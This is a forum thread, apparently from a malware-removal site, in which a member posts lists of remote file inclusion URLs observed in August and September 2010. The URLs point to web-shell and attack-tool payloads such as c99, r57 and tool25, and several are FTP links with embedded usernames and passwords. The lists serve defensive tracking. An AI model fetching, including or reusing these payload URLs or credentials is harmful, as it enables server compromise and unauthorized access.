http://kesawan.fileave.com/irc/sh.txt
http://02546325.t35.com/ttol/tool25.dat
ftp://dkwf_zxq:linda024@dkwf.zxq.net/TestMail.php
http://www.cram.pt/form/danger.txt
http://www.tiggio.com//scripts/sc1
http://www.rhcurriculoecia.com.br/site/curriculos/log/g.txt
http://www.irishtoothache.com/id1.txt
http://www.informeseg.net.br/suporte/testarvull.txt
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

September 01, 2010, 09:40:06 am
Reply #682

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
RFIs August 2010
Code: [Select]
http://www.httpeds6.xpg.com.br/testarvull.txt
http://user.7host.com/visacopa2010/cmd_testa_vull.txt
http://216.24.165.3/contents/TESTADOR.txt
http://84.253.35.215/cerved/remoteweb/cache/vam1.txt
http://www.gloi.org/c99.txt
http://feltonelectriccorp.com/gallery/Solon/index.txt
http://gruz-line.ru/tester.txt
ftp://cmdftppvt:311205@ftp.webcindario.com/rst.php
http://www.lockcenter.com.ar/img/NewFile.txt
http://webproven.freewebhostx.com/nenem.txt.txt
http://thebookofe.dominiotemporario.com/tester.txt
http://sites.google.com/site/nurhayatisatu/1.txt
http://saldiri.org/c99.txt
http://unixserver2011unixsend2010.110mb.com/tool25.txt
http://unixserver2011unixsend2010.110mb.com/opa.txt
http://skoolage.hdfree.com.br/skl/other.txt
http://www.radioluiss.it/enviar/enviar2.txt
http://vinda1.zoomshare.com/files/Ckrid1.txt
http://www.fileden.com/files/2010/5/25/2870332//Ipbot.txt
http://nysbda.org/SummerConference/SC08/upload.txt
http://www.diervilla.pl/galeria/ogolna4/s/test.txt
ftp://bertolino2:X2SLww6v@ftp.bertolino2.web67.f1.k8.com.br/www/test.php
http://mulgahotel.com.au/media/n99.txt
http://1256895326547896.leadhoster.com/tool25.dat
http://server1.hosting24.com/~alambrad/chove.txt
http://www.mundoblizz.com/1.txt
http://tawba59.free.fr/articles/img/db/system/plugin/g.txt
http://novidades01.freewebhostx.com/teste.txt
http://phimhanquoc.info/to-be-del/images/fbfiles/ava
http://www.toyboxxxadultentertainment.com/tester.txt
http://info-sec.vec.go.th/Mail.txt
http://1942.jp/pitbull2.txt
http://tuttoscemo.com/elphpMailerz/test/test.txt
http://www.fileden.com/files/2010/5/25/2870332//q.txt
http://theislando.dominiotemporario.com/tester.txt
http://nagark.no-ip.org:4056/c99.txt
http://casper.fileave.com/Ckrid1.txt
http://www.track222.webd.pl/str/tool25.dat
http://www.erec-knole.com/templates/beez/cmd.doc
http://rimid.org/webbiblio/fx29id.txt
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg
http://www.internetix.com.br/img_sites/opa.dat
http://www.ccar.tk/web/upload_rv/NewDir/tool25.dat
http://european-fish.net/upload.txt
http://www.fileden.com/files/2010/5/25/2870332//X.txt
ftp://georgemetal:MsWABvo6@ftp.georgemetal.web60.f1.k8.com.br/teste.php
http://tamosemtodas.com.br/galeria/novopam.txt
http://nadiairc5.110mb.com/rrr1.txt
ftp://webscr13:k1k2k3@ftp.xpg.com.br/index7.php
http://deploeg.com/catalog/images/microsoft/g.txt
http://kameleonsarospatak.hu/profilkepek/Ckrid1.txt
http://www.ivankapresent.com/userdata/editor_img/inbx.txt
http://www.ivankapresent.com/userdata/editor_img/gma.txt
http://www.ivankapresent.com/userdata/editor_img/6.txt
http://www.ivankapresent.com/userdata/editor_img/gmail.txt
http://www.ivankapresent.com/userdata/editor_img/joox.txt
http://www.neurocentro.com.co/contact/bovsp.txt
ftp://mariap_zxq:bea212@mariap.zxq.net/TestMail.php
http://informacaosecreta.e-tifoso-dell-italia.it/secret.txt
http://aerflo.com/logs/id
http://autopesacarme.com.br/upar.jpg
http://kwiketa-skwirk.com/images/bobrok1.jpg
ftp://loleslol:311205@ftp.webcindario.com/rst.php
http://www.adkinshorton.net/genealogy/pe1.jpg
ftp://patti_zxq:vit201@patti.zxq.net/TestMail.php
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

October 01, 2010, 10:02:23 am
Reply #683

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
RFIs September 2010
Code: [Select]

http://sommercampus-goessendorf.com/modules/coppermine/to.txt
http://219-70-119-101.cable.dynamic.giga.net.tw/appserv/t.txt
ftp://webscr13:k1k2k3@ftp.xpg.com.br/envi.php
http://kwiketa-skwirk.com/images/id1.jpg
http://novidade007.faimpazzireiragazzi.it/xrd.txt
http://www.richardpoet.co.uk/tester.txt
http://besojena.homelinux.org/PhoneDatabase/Images/test.txt
http://www.bombeirosdeportugal.pt/modules/mod_jumi/id1.pdf
http://nerciocosmeticos.comercial.ws/chove.txt
http://www.shellbox.hit.bg/r57.txt
http://www.vw-freunde-saarbruecken.de/includes/test.pdf
http://200.34.175.15/NI/Archivos/war.txt
http://www.labo-rat-oire.fr//components/com_artforms/assets/captcha/includes/captchatalk/test.txt
http://ufaeda.ru/logs/id
http://200.209.69.194/imagem/gifs/TESTADOR.txt
http://www.downhomeoutdoors.com/chove.txt
http://www.stronywww.komputery-mikolow.com.pl/css/danger.txt
http://www.larminat.free.fr/sgf/t_commande.txt
http://www.leerjewijzer.nl/images/opa.txt
http://www.stomatformula.com.ua/includes/domit/a
http://www.presstige.cz/zapis/6/g.txt
http://www.tezaototal2010.xpg.com.br/nus.txt
http://www.santrix.com.au/e107_plugins/a
http://www.amazonpec.com.br/Amazonpec2009/includes/fckeditor/_samples/html/tes.txt
http://www.social.ap-team.ru/include/expl/fx29id1.txt
http://leandroserdesde.com.br/escan.jpg
http://www.cmdsamd.xpg.com.br/tester.txt
ftp://lucronarede.t5.com.br:864798@lucronarede.t5.com.br/r57.txt
http://www.ccar.tk/web/notocar/NewDir/tool25.txt
http://123mailings.net//modules/js_flashrotator/jpg/pit/test.txt
http://yennicq.be/tool20.dat
http://faridazaman.net/images/img.txt
http://www.postmytrips.com//inc/test.txt
http://autopesacarme.com.br/ok.jpg
http://www.fileden.com/files/2010/5/25/2870332//J.txt
http://www.alkantarafestival.pt/festival/css/css.txt
http://vittys.com/calendar//tools/id/id1.txt
http://www.footballtrainingsecrets.info/jenny/includes/js/tabs/int1.txt
http://yeshouse.mk.co.kr/education/p1.txt
http://autopesacarme.com.br/ok
http://www.acb.bs.it/fad/f.txt
ftp://myphptools:311205@ftp.webcindario.com/rst.php
http://www.internetix.com.br/sites/mocassin/img_produtos/asp/tool25.txt
http://www.internetix.com.br/sites/mocassin/img_produtos/asp/cmds.755.txt
http://www.internetix.com.br/sites/mocassin/img_produtos/asp/opa.txt
http://jewelleryoutlook.com/js/cmd.jpg
http://www.ans.nau.edu.ua/main/tool25.dat
http://www.stronywww.komputery-mikolow.com.pl/css/danger.txt
http://www.granddefi24heures.com/scan/g.txt
http://6800.wo.to/zb41/data/id/id1.txt
http://injek.at.ua/e107id1.txt
http://www.elieneamorim.com.br/site/imagem/css.txt
http://appheat.kaist.ac.kr/lecture/id.txt
ftp://admhost01.6te.net:aninha23@ftp.admhost01.6te.net/thumb.php
http://www.ivankapresent.com/userdata/editor_img/tool25.txt
http://www.cielovistanaturalmarket.info//backup/cmdstate.txt
http://cimz.fileave.com/id1.txt
http://aao.uob.edu.bh/TESTADOR.txt
http://www.marianunes.org.br/arquivos/af1cd994dfcb9286c394d142687ff5a0.txt
http://cheerytomato.com/ostest//assets/snippets/reflect/idx
http://aspid.bg/includes/js/ts
http://citramultimedia.web.id/includes/atut.txt
ftp://comercialsalme.orgfree.com:aninha23@ftp.comercialsalme.orgfree.com/thumb.php
http://www.daszki-szklane.eu/js/99135780/seuconteudo/diaenoite/new/war.txt
http://www.capunga.org.br/teste.txt
http://wl0.com.br/cmd.doc
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment